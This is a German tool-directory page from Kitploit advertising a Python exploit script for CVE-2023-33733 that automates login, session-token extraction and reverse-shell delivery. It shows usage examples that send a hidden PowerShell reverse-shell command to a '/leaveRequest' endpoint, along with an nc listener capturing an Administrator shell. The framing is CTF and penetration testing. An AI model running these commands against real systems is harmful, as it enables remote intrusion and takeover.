Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-33733-Exploit-PoC — Python-Exploit-Skript für CVE-2023-33733, das auf Webanwendungen abzielt. Automatisiert Authentifizierung, Sitzungsextraktion und Reverse-Shell-Übergabe für Penetrationstests und CTF-Umgebungen. | Kitploit
Tools/GitHubGitHub/l41kaa/cve-2023-33733-exploit-poc
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstests
GitHubl41kaa/cve-2023-33733-exploit-poc

CVE-2023-33733-Exploit-PoC

Python-Exploit-Skript für CVE-2023-33733, das auf Webanwendungen abzielt. Automatisiert Authentifizierung, Sitzungsextraktion und Reverse-Shell-Übergabe für Penetrationstests und CTF-Umgebungen.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
313vor 2 JahrenNoch nicht geprüft
Teilen

CVE-2023-33733-POC

Haftungsausschluss

Ich habe diese Schwachstelle weder gefunden noch nehme ich Anerkennung dafür in Anspruch. Dies ist lediglich ein Skript, das ich erstellt habe, um diese Schwachstelle für ein CTF einfacher auszunutzen. Für die ursprünglichen Informationen siehe: https://github.com/c53elyas/CVE-2023-33733

Dieses Skript soll lediglich ein schnelles Python3-Skript zum Ausnutzen von CVE-2023-33733 sein. Sie müssen den Host, den Port, den Befehl und ein gültiges Session-Cookie angeben.

Hilfemenü

root@kitploit:~
kali@kali:~/Desktop$ python3 exp.py --help 
usage: foothold.py [-h] --host HOST --port PORT --cmd CMD --session SESSION

options:
  -h, --help            show this help message and exit
  --host HOST
  --port PORT, -p PORT
  --cmd CMD, -c CMD
  --username USERNAME, -u USERNAME
  --password PASSWORD, -ps PASSWORD
  --session SESSION, --cookie SESSION, -sc SESSION
                        Session cookie

Verwendung

root@kitploit:~
kali@kali:~/Desktop$ python3 exp.py --host "vuln.server" --port 80 --cmd "powershell -nop -w hidden -e <your revshell code here>" --username "<your username here>" --password "<your password here>"
[*] Logging in to http://vuln.server:80
Retreived session cookie: SESSION=...
[*] Extracting session token...
[*] Token extracted:  .abc.xyz
[*] Building Exploit...
[*] Exploit built
[*] Preparing request
[*] Sending request to http://vuln.server:80/leaveRequest
[*] Sending a reverse shell should cause request to hang
[*] Request sent
[*] Probable success. Status Code 504


kali@kali:~/Desktop$ python3 exp.py --host "vuln.server" --port 80 --cmd "powershell -nop -w hidden -e <your revshell code here>" --session "<your cookie here>"
[*] Building Exploit...
[*] Exploit built
[*] Preparing request
[*] Sending request to http://vuln.server:80/leaveRequest
[*] Sending a reverse shell should cause request to hang
[*] Request sent
[*] Probable success. Status Code 500


# Listener

kali@kali:~/Desktop$ nc -lnvp 9001 connect to [10.10.10.2] from (UNKNOWN) [10.10.10.1] 50246 whoami Administrator

root@kitploit:~
Tool herunterladen